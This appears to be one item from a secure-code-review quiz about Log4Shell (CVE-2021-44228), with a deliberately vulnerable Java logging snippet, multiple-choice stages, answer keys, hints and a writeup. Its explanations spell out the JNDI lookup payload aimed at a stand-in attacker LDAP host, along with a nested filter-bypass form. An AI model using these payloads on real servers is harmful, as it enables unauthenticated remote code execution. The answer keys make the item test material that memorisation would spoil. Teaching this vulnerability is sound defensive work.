{
  "id": "srd-0012",
  "date": "2026-10-13",
  "difficulty": "hard",
  "language": "java",
  "estimatedMinutes": 30,
  "snippet": {
    "files": [
      {
        "name": "LogRequest.java",
        "code": "// Simplified from Apache Log4j2 message formatting, pre-2.15.\npublic void logRequest(HttpServletRequest req) {\n    String ua = req.getHeader(\"User-Agent\");\n    logger.info(\"request from {} ua={}\", req.getRemoteAddr(), ua);\n}\n\n// Inside the logging pipeline, the formatted message is scanned for\n// ${...} expressions and each is resolved by a lookup (jndi, env, ...).\nstatic String render(String formatted) {\n    return StrSubstitutor.replace(formatted);   // expands ${jndi:...}\n}",
        "notes": {
          "3": "Reads the client-supplied User-Agent header.",
          "4": "Logs it. The `{}` placeholders are replaced with the address and the User-Agent.",
          "7": "After the message is assembled, the pipeline scans the final text for `${...}` expressions.",
          "9": "Helper that performs that expansion.",
          "10": "Resolves each `${...}` via a lookup — including `${jndi:...}`, which reaches out over the network."
        }
      }
    ]
  },
  "stages": {
    "line": {
      "file": "LogRequest.java",
      "line": 10,
      "yellowRadius": 2,
      "maxGuesses": 5
    },
    "bugClass": {
      "answer": "log-inj",
      "options": [
        "log-inj",
        "code-inj",
        "insecure-deser",
        "ssrf",
        "command-inj",
        "xxe"
      ]
    },
    "why": {
      "answerIndex": 1,
      "options": [
        {
          "label": "Logging the User-Agent on every request fills the disk, a denial of service",
          "whyWrong": "Log volume is unrelated; the danger is that the log text is interpreted, not merely stored."
        },
        {
          "label": "The log message contains attacker text that is interpolated for `${}` lookups, so `${jndi:ldap://attacker/x}` makes the server resolve a remote object and load attacker code"
        },
        {
          "label": "`getRemoteAddr()` can be spoofed via X-Forwarded-For",
          "whyWrong": "Address spoofing is a different concern and doesn't lead to code execution here."
        }
      ]
    },
    "fix": {
      "answerIndex": 1,
      "options": [
        {
          "label": "Strip the substring '${' from the User-Agent before logging",
          "diff": "-    logger.info(\"request from {} ua={}\", req.getRemoteAddr(), ua);\n+    logger.info(\"request from {} ua={}\", req.getRemoteAddr(), ua.replace(\"${\", \"\"));",
          "whyWrong": "Obfuscated and nested forms like `${${lower:j}ndi:...}` reconstruct the sequence after naive stripping."
        },
        {
          "label": "Disable message-pattern lookups and remove JNDI resolution (e.g. formatMsgNoLookups / upgrade)",
          "diff": "-    return StrSubstitutor.replace(formatted);\n+    return formatted; // message lookups disabled; JNDI lookup removed"
        },
        {
          "label": "HTML-escape the User-Agent before logging",
          "diff": "-    ... ua);\n+    ... escapeHtml(ua));",
          "whyWrong": "Wrong context entirely; HTML escaping doesn't stop `${}` lookup interpolation."
        },
        {
          "label": "Log at debug level instead of info",
          "diff": "-    logger.info(...)\n+    logger.debug(...)",
          "whyWrong": "The lookup still runs whenever the statement is logged; the level is irrelevant."
        }
      ]
    }
  },
  "source": {
    "origin": "cve",
    "cve": "CVE-2021-44228",
    "project": "Apache Log4j2",
    "advisory": "https://nvd.nist.gov/vuln/detail/CVE-2021-44228",
    "license": "Apache-2.0",
    "attribution": "Apache Log4j2, CVE-2021-44228 (Log4Shell), simplified"
  },
  "training": {
    "exploit": "Send `User-Agent: ${jndi:ldap://attacker.example/a}`. When the line is logged, Log4j interpolates the `${jndi:...}` lookup, connects to the attacker's LDAP server, downloads the referenced Java class, and executes it — unauthenticated remote code execution. Any logged attacker-controlled field (headers, form fields, usernames) is a vector.",
    "concepts": [
      "CWE-917",
      "CVE-2021-44228"
    ],
    "hints": {
      "line": "The dangerous step interprets the log text, not the one that writes it.",
      "bugClass": "Attacker text in a log message is evaluated as an expression.",
      "why": "What does a `${jndi:...}` lookup actually do?",
      "fix": "Stop interpreting log messages as expressions, and remove JNDI."
    }
  },
  "writeup": {
    "summary": "Log4j2 scanned every formatted log message for `${...}` expressions and resolved them via lookups, including `jndi`. Because logged data often includes attacker-controlled fields (here the User-Agent), a value of `${jndi:ldap://attacker/x}` made the server connect to an attacker LDAP/RMI endpoint and load a remote class — remote code execution just by being logged. This is Log4Shell. The real remediation disabled message lookups and removed JNDI resolution; string-stripping defenses were repeatedly bypassed with nested lookups.",
    "readNext": [
      {
        "label": "CVE-2021-44228 (NVD)",
        "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-44228"
      },
      {
        "label": "Apache Log4j Security Advisories",
        "url": "https://logging.apache.org/log4j/2.x/security.html"
      }
    ]
  }
}
